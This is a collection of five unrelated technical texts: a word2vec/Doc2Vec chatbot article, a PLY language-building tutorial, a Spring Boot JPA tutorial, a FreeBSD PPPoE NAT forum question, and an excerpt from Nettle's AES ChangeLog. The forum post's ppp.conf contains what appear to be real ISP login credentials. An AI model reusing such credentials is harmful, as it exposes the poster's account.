Now let's go through everything in order and in more formal language. We introduce the notion of a vector representation of text (word embeddings): a mapping of a natural-language word to a vector of fixed length (usually 100 to 500 dimensions; the higher the value, the more precise the representation, but the harder it is to compute).
For example, the words "science" and "book" might have the following representations:
v("science") = [0.956, -1.987…]
v("book") = [0.894, 0.234…]
A distributed representation of text suits this task best. Imagine a "space of meanings", an N-dimensional sphere in which every word, sentence or paragraph is a point. The question is how to build it.
In 2013 Tomas Mikolov published the paper "Efficient Estimation of Word Representations in Vector Space", in which he describes word2vec. It is a set of algorithms for finding distributed representations of words. Each word is mapped to a point in some semantic space, and algebraic operations in that space correspond to operations on the meaning of words (hence "semantic").
The picture illustrates this very important property of the space with the example of a "femininity" vector. If we subtract the vector of "man" from the vector of "king" and add the vector of "woman", we get "queen". You can find more examples in the Yandex lectures, which also explain word2vec "for humans", without heavy mathematics.
In Python it looks roughly like this (you will need the gensim package).
import gensim
w2v_fpath = "all.norm-sz100-w10-cb0-it1-min100.w2v"
w2v = gensim.models.KeyedVectors.load_word2vec_format(w2v_fpath, binary=True, unicode_errors='ignore')
w2v.init_sims(replace=True)
for word, score in w2v.most_similar(positive=[u"король", u"женщина"], negative=[u"мужчина"]):
print(word, score)
Here we use the word2vec model already built by the Russian Distributional Thesaurus project.
We get:
королева 0.856020450592041 бургундская 0.8100876212120056 регентша 0.8040660619735718 клеменция 0.7984248995780945 короля 0.7981560826301575 ангулемская 0.7949156165122986 королевская 0.7862951159477234 анжуйская 0.7808529138565063 лотарингская 0.7741949558258057 маркграфиня 0.7644592523574829
Let's take a closer look at the words nearest to «король» (king). There is a resource for finding semantically related words; the result is shown as an ego network. Below are the 20 nearest neighbours of the word «король».
The model Mikolov proposed is very simple: it assumes that words occurring in similar contexts tend to mean similar things. Consider the architecture of the neural network.
Word2vec uses a single hidden layer. The input layer has as many neurons as there are words in the vocabulary. The size of the hidden layer is the dimensionality of the space. The output layer is the same size as the input layer. So, if the training vocabulary contains V words and the word vectors have N dimensions, the weights between the input and hidden layers form a matrix SYN0 of size V×N. It looks like this.
Each of the V rows is the N-dimensional vector representation of one word.
Similarly, the weights between the hidden and output layers form a matrix SYN1 of size N×V. The input of the output layer is then
u_j = SYN1_j^T · H,
where SYN1_j is the j-th column of the matrix SYN1.
The dot product is the cosine of the angle between two points in the N-dimensional space, and this formula shows how close the word vectors are; for opposite words the value is -1. We then apply softmax, the "soft maximum" function, to obtain a distribution over words.
Using softmax, word2vec maximises the cosine measure between vectors of words that occur together and minimises it for words that do not. This is the output of the neural network.
To better understand how the algorithm works, consider a training corpus consisting of the following sentences:
«Кот увидел собаку» (the cat saw the dog), «Кот преследовал собаку» (the cat chased the dog), «Белый кот взобрался на дерево» (the white cat climbed the tree).
The corpus vocabulary contains eight words: [«белый», «взобрался», «дерево», «кот», «на», «преследовал», «собаку», «увидел»]
After sorting alphabetically, each word can be referred to by its index in the vocabulary. In this example the neural network will have eight input and eight output neurons. Let there be three neurons in the hidden layer. Then SYN0 and SYN1 will be 8×3 and 3×8 matrices respectively. Before training, these matrices are initialised with small random values, as usual. Let SYN0 and SYN1 be initialised as:
Suppose the network has to learn the relationship between the words «взобрался» (climbed) and «кот» (cat). That is, the network should give a high probability to «кот» when «взобрался» is fed to the input. In computational-linguistics terminology, «кот» is the centre word and «взобрался» is the context word.
In this case the input vector X will be [0 1 0 0 0 0 0 0]^T (because «взобрался» is second in the vocabulary).
The vector of the word «кот» is [0 0 0 1 0 0 0 0]^T.
When the vector representing «взобрался» is fed to the network, the output of the hidden-layer neurons can be computed as:
Note that the hidden-layer vector H equals the second row of the matrix SYN0. Thus the activation function of the hidden layer simply copies the vector of the input word into the hidden layer.
Similarly for the output layer:
We need the probabilities of the words at the output layer, p(word_j | «взобрался») for j = 1, …, V, which reflect the relationship of the centre word to the context word at the input. To map a vector to probabilities, softmax is used. The output of the j-th neuron is computed by the expression
y_j = exp(u_j) / Σ_{k=1..V} exp(u_k)
The probabilities of the eight words in the corpus are then [0.143073, 0.094925, 0.114441, 0.111166, 0.14492, 0.122874, 0.119431, 0.14488], and the probability of «кот» is 0.111166 (by its index in the vocabulary).
So we have assigned a vector to each word. But we need to work not with single words but with phrases or whole sentences, because that is how people communicate. For this there is Doc2vec (originally Paragraph Vector), an algorithm based on word2vec that produces distributed representations for pieces of text. The texts can be of any length, from a phrase to several paragraphs, and, importantly, the output is a vector of fixed length.
Boltoon is built on this technology. First we build a 300-dimensional semantic space (as mentioned above, dimensionality is usually chosen between 100 and 500) from the Russian-language Wikipedia (link to the dump).
A bit more Python.
from gensim.models.doc2vec import Doc2Vec

model = Doc2Vec(min_count=1, window=10, size=100, sample=1e-4, workers=8)
We create an instance of the class for subsequent training, with the parameters:
min_count: the minimum word frequency; words below it are ignored
window: the size of the context window
size: the dimensionality of the vectors (of the space)
sample: the maximum word frequency; words above it are ignored
workers: the number of threads
model.build_vocab(documents)
Build the vocabulary table. documents is the Wikipedia dump.
model.train(documents, total_examples=model.corpus_count, epochs=20)
Training. total_examples is the number of input documents. Training is done once. It is a resource-hungry process; I built the model from a 50 MB Wikipedia dump (my laptop with 8 GB of RAM couldn't handle more). Then we save the trained model and get these files.
As mentioned above, SYN0 and SYN1 are the weight matrices formed during training. These objects are saved to separate files with pickle. Their size is proportional to N×V×W, where N is the vector dimensionality, V the number of words in the vocabulary, and W the weight of a single symbol. Hence the large file sizes.
Back to the database of questions and answers. We find the coordinates of all its phrases in the space we have just built. It follows that when the database grows we do not have to retrain the system: it is enough to take the added phrases and find their coordinates in the same space. This is Boltoon's main advantage: fast adaptation to updated data.
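Getting the coordinate of a phrase in the trained space is a single call in gensim. A minimal sketch, assuming the model trained above and a naive whitespace tokenizer (real preprocessing would be more careful):
# phrases from the question column of the database, tokenized very naively
phrases = ["как дела", "что ты умеешь", "расскажи о погоде"]
# 'model' is the Doc2Vec model trained above; infer_vector maps a token list to a point in the space
vectors = {p: model.infer_vector(p.split()) for p in phrases}
# the same call gives the coordinate of an incoming user message
query_vec = model.infer_vector("как у тебя дела".split())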
Now let's talk about responding to the user. We find the coordinate of the question in the space and the phrase closest to it in the database. But this raises the problem of finding the nearest point to a given one in N-dimensional space. I suggest using a KD-Tree (you can read more about it here).
A KD-Tree (k-dimensional tree) is a data structure that partitions k-dimensional space into subspaces of lower dimension by cutting it with hyperplanes.
from scipy.spatial import KDTree
def build_tree(self, ethalon):
return KDTree(list(ethalon.values()))
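Once the tree is built, the nearest stored phrase is found with a single query. A small sketch, assuming the vectors dictionary and query_vec from the sketch above:
import numpy as np
from scipy.spatial import KDTree

# 'vectors' and 'query_vec' come from the sketch above
keys = list(vectors.keys())
tree = KDTree(np.array([vectors[k] for k in keys]))
# index and distance of the semantically closest phrase in the database
distance, index = tree.query(query_vec)
print(keys[index], distance)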
But it has a significant drawback: when an element is added, rebuilding the tree takes O(N log N) on average, which is slow. So Boltoon uses "lazy" updating: the tree is rebuilt after every M phrases added to the database. Lookup takes O(log N).
To keep training Boltoon, the following feature was added: after answering a question, the bot sends the reply together with two buttons for rating its quality.
If the rating is negative, the user is asked to correct the answer, and the corrected result is stored in the database.
An example of a dialogue with Boltoon using phrases that are not in the database.
Of course, this can hardly be called "intelligence"; Boltoon possesses no reasoning of any kind. It is far from top bots like Siri or the recent Alice, but that does not make it useless or uninteresting; after all, it is a student project built by one person during a summer internship. Later I plan to bolt on a module for post-processing answers (agreement with the interlocutor's gender, for example), memory of the conversation context (over the last few messages), and handling of typos. Hopefully the result will be a smarter Boltoon 2.0. But that is a conversation for the next article.
P.S. You can try Boltoon on Telegram at @boltoon_bot, just don't forget to rate every answer you get, otherwise your subsequent messages will be ignored. And I can see all the logs (who wrote what), so let's keep things civil.
|
Making your own programming language with Python
Making your own programming language with Python
Why make your own language?
When you write your own programming language, you control the entire programmer experience.
This allows you to shape exactly how each aspect of your language works and how a developer interacts with it.
This allows you to make a language with things you like from other languages and none of the stuff you don't.
In addition, learning about programming language internals can help you better understand the internals of programming languages you use every day, which can make you a better programmer.
How programming languages work
Every programming language is different in the way it runs, but many consist of a couple fundamental steps: lexing and parsing.
Introduction to Lexing
Lexing is short for LEXical analysis.
The lex step is where the language takes the raw code you've written and converts it into an easily parsable structure.
This step interprets the syntax of your language and turns the text into special symbols inside the language called tokens.
For example, let's say you have some code you want to parse. To keep it simple I'll use Python-like syntax, but it could be anything. It doesn't even have to be text.
# this is a comment
a = (1 + 1)
A lexer to parse this code might do the following:
Discard all comments
Produce a token that represents a variable name
Produce left and right parenthesis tokens
Convert literals like numbers or strings to tokens
Produce tokens for math operations like + - * / (and maybe bitwise/logical operators as well)
The lexer will take the raw code and interpret it into a list of tokens.
The lexer can also be used to ensure that two pieces of code that may look different, like 1 + 1 and 1+1, are still parsed the same way.
For the code above, it might generate tokens like this:
NAME(a) EQUALS LPAREN NUMBER(1) PLUS NUMBER(1) RPAREN
Tokens can be in many forms, but the main idea here is that they are a standard and easy to parse way of representing the code.
Introduction to Parsing
The parser is the next step in the running of your language.
Now that the lexer has turned the text into consistent tokens, the parser simplifies and executes them.
Parser rules recognize a sequence of tokens and do something about them.
Let's look at a simple example for a parser with the same tokens as above.
A simple parser could just say:
If I see the GREET token and then a NAME token, print Hello, and then the name.
A more complicated parser aiming to parse the code above might have these rules, which we will explore later:
Try to classify as much code as possible as an expression. By "as much code as possible" I mean the parser will first try to consider a full mathematical operation as an expression, and then, if that fails, convert a single variable or number to an expression. This ensures that as much code as possible will be matched as an expression. The "expression" concept allows us to catch many patterns of tokens with one piece of code. We will use the expression in the next step.
Now that we have a concept of an expression, we can tell the parser that if it sees the tokens NAME EQUALS and then an expression, that means a variable is being assigned.
Using PLY to write your language
What is PLY?
Now that we know the basics of lexing and parsing, lets start writing some python code to do it.
PLY stands for Python Lex Yacc.
It is a library you can use to make your own programming language with python.
Lex is a well known library for writing lexers.
Yacc stands for "Yet Another Compiler Compiler", which means it compiles new languages, which are themselves compilers.
This tutorial is a short example, but the PLY documentation is an amazing resource with tons of examples. I would highly recommend that you check it out if you are using PLY.
For this example, we are going to be building a simple calculator with variables. If you want to see the fully completed example, you can fork this repl: [TODO!!]
Lexing with PLY lex
Lexer tokens
Lets start our example! Fire up a new python repl and follow along with the code samples.
To start off, we need to import PLY:
from ply import lex, yacc
Now let's define our first token. PLY requires you to have a tokens list which contains every token the lexer can produce. Let's define our first token, PLUS for the plus sign:
tokens = [
'PLUS',
]
t_PLUS = r'\+'
A string that looks like r'' is special in python. The r prefix means "raw", which includes backslashes in the string. For example, to define the string \+ in python, you could either do '\\+' or r'\+'. We are going to be using a lot of backslashes, so raw strings make things a lot easier.
But what does \+ mean?
Well in the lexer, tokens are mainly parsed using regexes.
A regex is like a special programming language specifically for matching patterns in text.
A great resource for regexes is regex101.com where you can test your regexes with syntax highlighting and see explanations of each part.
I'm going to explain the regexes included in this tutorial, but if you want to learn more you can play around with regex101 or read one of the many good regex tutorials on the internet.
The regex \+ means "match a single character +".
We have to put a backslash before it because + normally has a special meaning in regex, so we have to "escape" it to show we want to match a + literally.
We are also required to define a function that runs when the lexer encounters an error:
def t_error(t):
print(f"Illegal character {t.value[0]!r}")
t.lexer.skip(1)
This function just prints out a warning when it hits a character it doesn't recognize and then skips it (the !r means repr so it will print out quotes around the character).
You can change this to be whatever you want in your language though.
Optionally, you can define a newline token which isn't produced in the output of the lexer, but keeps track of each line.
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
Since this token is a function, we can define the regex in docstring of the function instead.
The function takes a parameter t, which is a special object representing the match that the lexer found. We can access the lexer using the t.lexer attribute.
This function matches at least one newline character and then increases the line number by the amount that it sees. This allows the lexer to know what line number it's on at all times using the lexer.lineno variable.
Now we can use the line number in our error function:
def t_error(t):
print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
t.lexer.skip(1)
Let's test out the lexer!
This is just some temporary code, you don't have to know what this code does, because once we implement a parser, the parser will run the lexer for you.
lexer = lex.lex()
lexer.input('+')
for token in lexer:
print(token)
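If everything is wired up correctly, the loop should print a single token object, something along the lines of (exact line and position numbers depend on the input):
LexToken(PLUS,'+',1,0)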
Play around with the value passed to lexer.input.
You should notice that any character other than a plus sign makes the error message print out, but doesn't crash the program.
In your language, you can make it gracefully ignore lex errors like this or make it stop running by editing the t_error function.
If you add more lines to the input string, the line number in the error message should change.
More complicated tokens
Let's delete the test token add some more complicated tokens.
Replace your tokens list and the t_PLUS line with the following code:
reserved_tokens = {
'greet': 'GREET'
}
tokens = list(reserved_tokens.values()) + [
    'SPACE',
    'NAME'
]
t_SPACE = r'[ ]'
def t_ID(t):
r'[a-zA-Z_][a-zA-Z0-9_]*'
if t.value in reserved_tokens:
t.type = reserved_tokens[t.value]
else:
t.type = 'NAME'
return t
Let's explore the regex we have in the t_ID function.
This regex is more complicated than the simple ones we've used before.
First, we have [a-zA-Z_]. This is a character class in regex. It means, match any lowercase letter, uppercase letter, or underscore.
Next we have [a-zA-Z0-9_]. This is the same as above except numbers are also included.
Finally, we have *. This means "repeat the previous group or class zero to unlimited times".
Why do we structure the regex like this?
Having two separate classes makes sure that the first one must match for it to be a valid variable.
If we exclude numbers from the first class, it not only doesn't match just regular numbers, but makes sure you can't start a variable with a number.
You can still have numbers in the variable name, because they are matched by the second class of the regex.
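If you want to convince yourself of how this regex behaves, you can try it directly with Python's re module; this quick check is only illustrative and is not part of the lexer:
import re

pattern = re.compile(r'[a-zA-Z_][a-zA-Z0-9_]*')
for s in ['greet', 'my_var2', '2cool', '_hidden']:
    print(s, bool(pattern.fullmatch(s)))
# greet True, my_var2 True, 2cool False, _hidden True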
In the code, we first have a dictionary of reserved names.
This is a mapping of patterns to the token type that they should be.
The only one we have says that greet should be mapped to the GREET token.
The code that sets up the tokens list takes all of the possible reserved token values (in this example it's just ['GREET']) and adds on ['SPACE', 'NAME'], giving us ['GREET', 'SPACE', 'NAME'] automatically!
But why do we have to do this? Couldn't we just use something like the following code?
# Don't use this code! It doesn't work!
t_GREET = r'greet'
t_SPACE = r'[ ]'
t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'
Actually, if we used that code, greet would never be matched! The lexer would match it with the NAME token. In order to avoid this, we define a new type of token which is a function. This function has the regex as its docstring and is passed a t parameter. This parameter has a value attribute which is the pattern matched.
The code inside this function simply checks if this value is one of the special reserved names we defined before. If it is, we set the special type attribute of the t parameter. This type controls the type of token which is produced from the pattern. When it sees the name greet, it will see greet is in the reserved names dictionary and produce a token type of GREET because that is the corresponding value in the dictionary. Otherwise, it will produce a NAME token because this is a regular variable.
This allows you to add more reserved terms easily later, its as simple as adding a value to the dictionary.
If needed, you could also make the keys of the reserved names dictionary regexes and then match each regex against t.value in the function.
If you want to change these rules for your language, feel free!
Parsing with PLY yacc
Fair warning: Yacc can sometimes be hard to use and debug, even if you know Python well.
Keep in mind, you don't have to use both lex and yacc, if you want you can just use lex and then write your own code to parse the tokens.
With that said lets get started.
Yacc basics
Before we get started, delete the lexer testing code (everything from lexer.input onward).
When we run the parser, the lexer is automatically run.
Let's add our first parser rule!
def p_hello(t):
'statement : GREET SPACE NAME'
print(list(t))
print(f"Hello, {t[3]}")
Let's break this down.
Again, we have information on the rule in the docstring.
This information is called a BNF Grammar. A statement in BNF Grammar consists of a grammar rule known as a non-terminal and terminals.
In the example above, statement is the non-terminal and GREET SPACE NAME are terminals.
The left-hand side describes what is produced by the rule, and the right-hand side describes what matches the rule.
The right hand side can also have non-terminals in it, just be careful to avoid infinite loops.
Basically, the yacc parser works by pushing tokens onto a stack, and looking at the current stack and the next token and seeing if they match any rules that it can use to simplify them. Here is a more in-depth explanation and example.
Before the above example can run, we still have to add some more code.
Just like for the lexer, the error handler is required:
def p_error(t):
if t is None: # lexer error, already handled
return
print(f"Syntax Error: {t.value!r}")
Now let's create and run the parser:
parser = yacc.yacc()
parser.parse('greet replit')
If you run this code you should see:
[None, 'greet', ' ', 'replit']
Hello, replit
The first line is the list version of the object passed to the parser function.
The first value is the statement that will be produced from the function, so it is None.
Next, we have the values of the tokens we specified in the rule.
This is where the t[3] part comes from. This is the third item in the array, which is the NAME token, so our parser prints out Hello, replit!
Note: Creating the parser tables is a relatively expensive operation, so the parser creates a file called
parsetab.py which it can load the parse tables from if they haven't changed.
You can change this filename by passing a kwarg into the yacc initialization, like parser = yacc.yacc(tabmodule='fooparsetab')
More complicated parsing: Calculator
This example is different from our running example, so I will just show a full code example and explain it.
from ply import lex, yacc
tokens = (
'NUMBER',
'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
'LPAREN', 'RPAREN',
)
t_PLUS = r'\+'
t_MINUS = r'-'
t_TIMES = r'\*'
t_DIVIDE = r'/'
t_LPAREN = r'\('
t_RPAREN = r'\)'
def t_NUMBER(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print(f"Integer value too large: {t.value}")
t.value = 0
return t
def t_newline(t):
r'\n+'
t.lexer.lineno += len(t.value)
def t_error(t):
print(f"Illegal character {t.value[0]!r} on line {t.lexer.lineno}")
t.lexer.skip(1)
t_ignore = ' \t'
lexer = lex.lex()
# Parsing
def p_expression_binop(t):
'''expression : expression PLUS expression
| expression MINUS expression
| expression TIMES expression
| expression DIVIDE expression'''
if t[2] == '+' : t[0] = t[1] + t[3]
elif t[2] == '-': t[0] = t[1] - t[3]
elif t[2] == '*': t[0] = t[1] * t[3]
elif t[2] == '/': t[0] = t[1] / t[3]
def p_expression_group(t):
'expression : LPAREN expression RPAREN'
t[0] = t[2]
def p_expression_number(t):
'expression : NUMBER'
t[0] = t[1]
def p_error(t):
if t is None: # lexer error
return
print(f"Syntax Error: {t.value!r}")
parser = yacc.yacc()
if __name__ == "__main__":
while True:
inp = input("> ")
print(parser.parse(inp))
First we start off with the tokens: numbers, mathematical operations, and parenthesis.
You might notice that I didn't use the reserved_tokens trick, but you can implement it if you want.
Next we have a simple number token which matches 0-9 with \d+ and then converts its value from a string to an integer.
The next code we haven't used before is t_ignore.
This variable is a string of all the characters the lexer should ignore; here it is ' \t', i.e. spaces and tabs.
When the lexer sees these, it will just skip them. This allows users to add spaces without it affecting the lexer.
Now we have 3 parser directives.
The first is a large one, producing an expression from 4 possible input values, one for each math operation.
Each input has an expression on either side of the math operator.
Inside this directive, we have some (pretty ugly) code that performs the correct operation based on the operation token given.
If you want to make this prettier, consider a dictionary using the python stdlib operator module.
Next, we define an expression with parenthesis around it as being the same as the expression inside.
This makes the value inside the parentheses be substituted in for them, so the expression inside is evaluated first.
With very little code we created a very complicated rule that can deal with nested parenthesis correctly.
Finally, we define a number as being able to be an expression, which allows a number to be used as one of the expressions in rule 1.
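One caveat: as written, the grammar is ambiguous (yacc will report shift/reduce conflicts and resolve them by shifting), so the usual precedence of * and / over + and - is not guaranteed. PLY lets you declare operator precedence with a precedence table; a minimal sketch of what you could add next to the parser rules:
# lowest precedence first; 'left' makes the operators left-associative
precedence = (
    ('left', 'PLUS', 'MINUS'),
    ('left', 'TIMES', 'DIVIDE'),
)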
For a challenge, try adding variables into this calculator!
You should be able to set variables by using syntax like varname = any_expression and you should be able to use variables in expressions.
If you're stuck, see one solution from the PLY docs.
Thats it!
Thanks for reading! If you have questions, feel free to ask on the Replit discord's #help-and-reviews channel, or just the comments.
Have fun!
|
Introduction
JPA (Java Persistence API) is the official Java persistence specification proposed by Sun. It gives Java developers an object/relational mapping facility for managing relational data in Java applications. It was introduced mainly to simplify existing persistence work and to consolidate ORM technology, ending the situation where ORM frameworks such as Hibernate, TopLink and JDO each went their own way. Notably, JPA was developed by absorbing the strengths of the existing Hibernate, TopLink and JDO frameworks, so it is easy to use and scales well. Judging by the reaction of the developer community, JPA has received a great deal of support and praise.
JPA (Java Persistence API) is a specification, not a product. Hibernate, TopLink and JDO are products, and if such a product implements the JPA specification we can call it a JPA implementation.
Hibernate is a full ORM framework and conforms to the JPA specification; MyBatis does not follow JPA. Currently neither Spring nor Spring Boot officially ships dedicated support for MyBatis, whereas integration with Hibernate has always been there. That does not mean MyBatis and Spring cannot be integrated: the MyBatis community itself maintains Spring and Spring Boot integration, so technically neither is a problem.
ORM means object-relational mapping: a layer is wrapped around database operations for the objects in your code, hiding the SQL queries. I first came across the concept in Django and was amazed; designing models that map straight to database tables is delightful. Here we look at how to use ORM in Spring Boot.
Add the dependencies
<!-- spring-data-jpa dependency -->
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-data-jpa</artifactId>
</dependency>
<!-- mysql -->
<dependency>
    <groupId>mysql</groupId>
    <artifactId>mysql-connector-java</artifactId>
    <version>5.1.21</version>
</dependency>
To make the model classes easier to write later on, you can also add Lombok:
<dependency>
    <groupId>org.projectlombok</groupId>
    <artifactId>lombok</artifactId>
</dependency>
Create the entity model (Model)
import lombok.Getter;
import lombok.Setter;
import org.hibernate.annotations.GenericGenerator;
import javax.persistence.*;
import java.io.Serializable;

@Entity
@Table(name = "role")
@Setter
@Getter
public class Role implements Serializable {
    public Role() {
    }

    public Role(String name) {
        this.name = name;
    }

    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private Long id;

    private String name;
}
@Setter and @Getter use Lombok's annotations, which keep the code short.
The @Entity annotation marks the class as a model; later we will compare this with model definitions in Django.
The @Table annotation specifies the name of the database table created for this model.
Create the entity repository (Repository)
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.stereotype.Repository;

@Repository
public interface RoleRepository extends JpaRepository<Role, Long> {
    Role findById(String id);
}
Create the Service interface
import com.example.demo_jpa.model.Role;
import java.util.List;

public interface RoleService {
    Role save(Role role);
    List<Role> findAll();
}
Service implementation
import com.example.demo_jpa.model.Role;
import com.example.demo_jpa.model.RoleRepository;
import org.springframework.stereotype.Service;
import javax.annotation.Resource;
import java.util.List;

@Service
public class RoleServiceImpl implements RoleService {
    @Resource
    private RoleRepository roleRepository;

    @Override
    public Role save(Role role) {
        return roleRepository.save(role);
    }

    @Override
    public List<Role> findAll() {
        return roleRepository.findAll();
    }
}
Run
After running the Application, the database tables are generated automatically.
Comparison with Django
Here is an example of a model definition in Django:
class Device(models.Model):
    '''设备'''
    vm_choice = (
        (-1, '未知'),
        (0, '否'),
        (1, '是'),
    )
    mac = models.CharField(max_length=32, verbose_name='MAC地址', null=True)
    disk = models.CharField(max_length=128, verbose_name='硬盘ID', null=True)
    ip = models.CharField(max_length=32, verbose_name='IP地址', blank=True)
    vm = models.IntegerField(choices=vm_choice, default=-1, verbose_name='是否虚拟环境')

    def __str__(self):
        return self.mac

    class Meta:
        db_table = 'device'
        verbose_name = '机器设备'
        verbose_name_plural = verbose_name
        unique_together = ('mac', 'disk')
Inheriting from models.Model makes the class a model.
Each class attribute becomes a column in the table.
db_table specifies the name of the table created for this model.
verbose_name sets the name shown in the admin site.
verbose_name_plural sets the plural form of that name shown in the admin site.
Comparing the two, they are really quite similar.
|
Help me figure out NAT for PPPoE
2008-02-23 11:56:40
Even though here in Ukraine we have a damned government that keeps cancelling and changing things... we all still celebrate this holiday; for us it was, is, and will be, and no Yushchenkos will change that...
So I came in to work on this fine day, of my own free will. While nobody else is around, I can poke at the Internet connection and finally figure out how it is all set up.
FreePascal and proxy-man have been helping me, and I am very grateful to them, but I can't keep pestering them with questions in private messages, so I decided to post here. The question itself is this:
The provider is Ukrtelecom, the connection is PPPoE, with DHCP on the provider's side.
My configs:
Code:
server# cat /etc/rc.conf
font8x14="cp866-8x14"
font8x16="cp866b-8x16"
font8x8="cp866-8x8"
keymap="ru.koi8-r"
keyrate="fast"
mousechar_start="3"
moused_enable="NO"
moused_type="NO"
saver="blank"
scrnmap="koi8-r2cp866"
sshd_enable="YES"
inetd_enable="YES"
usbd_enable="NO"
ifconfig_xl0="inet 192.168.0.250 netmask 255.255.255.0"
hostname="server.work"
ppp_enable="YES"
ppp_mode="ddial"
#ppp_nat="YES"
ppp_profile="adsl"
ppp_user="root"
#gateway_enable="YES"
#natd_enable="YES"
#natd_interface="tun0"
#natd_flags="-m"
firewall_enable="YES"
firewall_script="/etc/rc.firewall"
firewall_type="OPEN"
firewall_logging="YES"
tcp_drop_synfin="YES"
Code:
server# cat /etc/ppp/ppp.conf
default:
adsl:
set device PPPoE:rl0
set MTU 1492
set MRU 1492
set dial
set crtscts off
accept lqr
disable deflate
disable pred1
disable vjcomp
disable acfcomp
disable protocomp
set log Phase LCP IPCP CCP Warning Error Alert
set ifaddr 10.0.0.1/0 10.0.0.2/0 0.0.0.0 0.0.0.0
add default HISADDR
set login
set authname tundra
set authkey tundra
enable dns
# nat enable yes
# nat log on
# nat same_ports yes
# nat unregistered_only yes
# nat deny_incoming no
Code:
server# ifconfig
rl0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=8<VLAN_MTU>
ether 00:02:44:71:b2:f0
media: Ethernet autoselect (100baseTX <full-duplex>)
status: active
xl0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=9<RXCSUM,VLAN_MTU>
inet 192.168.0.250 netmask 0xffffff00 broadcast 192.168.0.255
ether 00:04:76:99:5b:a6
media: Ethernet autoselect (100baseTX <full-duplex>)
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet 127.0.0.1 netmask 0xff000000
tun0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1492
inet 80.90.231.66 --> 80.90.236.2 netmask 0xffffffff
Opened by PID 320
Code:
server# ping www.ua
PING nic.net.ua (193.239.250.34): 56 data bytes
64 bytes from 193.239.250.34: icmp_seq=0 ttl=57 time=21.968 ms
64 bytes from 193.239.250.34: icmp_seq=1 ttl=57 time=18.646 ms
64 bytes from 193.239.250.34: icmp_seq=2 ttl=57 time=23.343 ms
^C
--- nic.net.ua ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max/stddev = 18.646/21.319/23.343/1.972 ms
|
2002-05-14 Niels Möller <niels@s3.kth.se>
* x86/aes-encrypt.asm (aes_encrypt): Replaced first quarter of the
round function with an invocation of AES_ROUND.
(aes_encrypt): Similarly for the second column.
(aes_encrypt): Similarly for the rest of the round function.
* x86/machine.m4 (AES_ROUND): New macro.
* x86/aes-encrypt.asm (aes_encrypt): Use AES_LOAD macro.
* x86/machine.m4 (AES_LOAD): New macro.
* x86/aes-encrypt.asm (aes_encrypt): Use AES_STORE.
* x86/machine.m4 (AES_STORE): New macro.
* x86/aes-encrypt.asm (aes_encrypt): Use the AES_LAST_ROUND macro
for the first column of the final round.
(aes_encrypt): Similarly for the second column.
(aes_encrypt): Similarly for the third and fourth column.
* x86/machine.m4 (AES_LAST_ROUND): New macro.
* x86/aes-encrypt.asm (aes_encrypt): Move code here...
* x86/aes.asm: ...from here.
* x86/aes.asm: Use addl and subl, not add and sub. Replaced
references to dtbl1-4 with references to _aes_encrypt_table.
* configure.ac (asm_path): Enable x86 assembler.
* x86/aes.asm (aes_decrypt): Adapted to the current interface.
Notably, the order of the subkeys was reversed. Single block
encrypt/decrypt works now.
2002-05-07 Niels Möller <niels@s3.kth.se>
* configure.ac: Generate config.m4.
* x86/aes.asm: Use C for comments, include the tables using
include_src, and commented out the key setup functions.
Fixed the processing of the first handling of the round function.
Now, encryption of a single block works! Multiple blocks, and
decryption, is still broken.
* x86/machine.m4: New file (empty).
* x86/aes-encrypt.asm: New file, empty for now.
* Makefile.am (%.asm): Added asm.m4, machine.m4 and config.m4 to
the m4 command line.
(libnettle_a_SOURCES): Added aes-encrypt-table.c.
* sparc/aes.asm: No need to include asm.m4, that is taken care of
by the Makefile.
* config.m4.in: New file, configuration for asm.m4.
* asm.m4 (C, include_src): New macros.
* aes-encrypt-table.c: New file, table moved out from
aes-encrypt.c.
2002-05-06 Niels Möller <niels@s3.kth.se>
* configure.ac (CFLAGS): Don't enable -Waggregate-return.
2002-05-05 Niels Möller <nisse@lysator.liu.se>
* configure.ac: Pass no arguments to AM_INIT_AUTOMAKE.
2002-05-05 Niels Möller <nisse@cuckoo.hack.org>
* configure.ac: Update for automake-1.6.
* configure.ac: Renamed file, used to be configure.in.
2002-03-20 Niels Möller <nisse@cuckoo.hack.org>
* testsuite/run-tests (test_program): Added missing single quote.
2002-03-20 Niels Möller <nisse@lysator.liu.se>
* testsuite/run-tests (test_program): Test the exit status of the
right process.
2002-03-19 Pontus Sköld <pont@it.uu.se>
* testsuite/run-tests: Removed /bin/bashisms to use with /bin/sh.
2002-03-18 Niels Möller <nisse@cuckoo.hack.org>
* rsa-keygen.c (rsa_generate_keypair): Output a newline after a
non-empty line of 'e':s (bad e was chosen, try again).
2002-03-16 Niels Möller <nisse@cuckoo.hack.org>
* configure.in (asm_path): AC_CONFIG_LINKS adds $srcdir
automatically.
2002-03-14 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm, x86/aes.asm: Added copyright notice.
* Makefile.am (libnettle_a_SOURCES): Added aes-internal.h.
(EXTRA_DIST): Added assembler files.
* configure.in (asm_path): Use $srcdir when looking for the files.
* configure.in (asm_path): For now, disable x86 assembler code.
2002-02-25 Niels Möller <nisse@cuckoo.hack.org>
* sparc/aes.asm (_aes_crypt): Moved increment of src into the
source_loop. Also fixed stop condition, the loop was run 5 times,
not 4, as it should.
(_aes_crypt): Use src directly when accessing the source data,
don't use %o5.
(_aes_crypt): Renamed variables in source_loop.
(_aes_crypt): Changed stop condition in source_loop to not depend
on i. Finally reduced the source_loop to 16 instructions. Also
increased the alignment of the code to 16.
(_aes_crypt): In final_loop, use preshifted indices.
(_aes_crypt): In final_loop, construct the result in t0. Use t0-t3
for intermediate values.
(_aes_crypt): In final_loop, use the register idx.
(_aes_crypt): In final_loop, keep i multiplied by 4. Use key to
get to the current roundkey.
(_aes_crypt): In final_loop, use i for indexing.
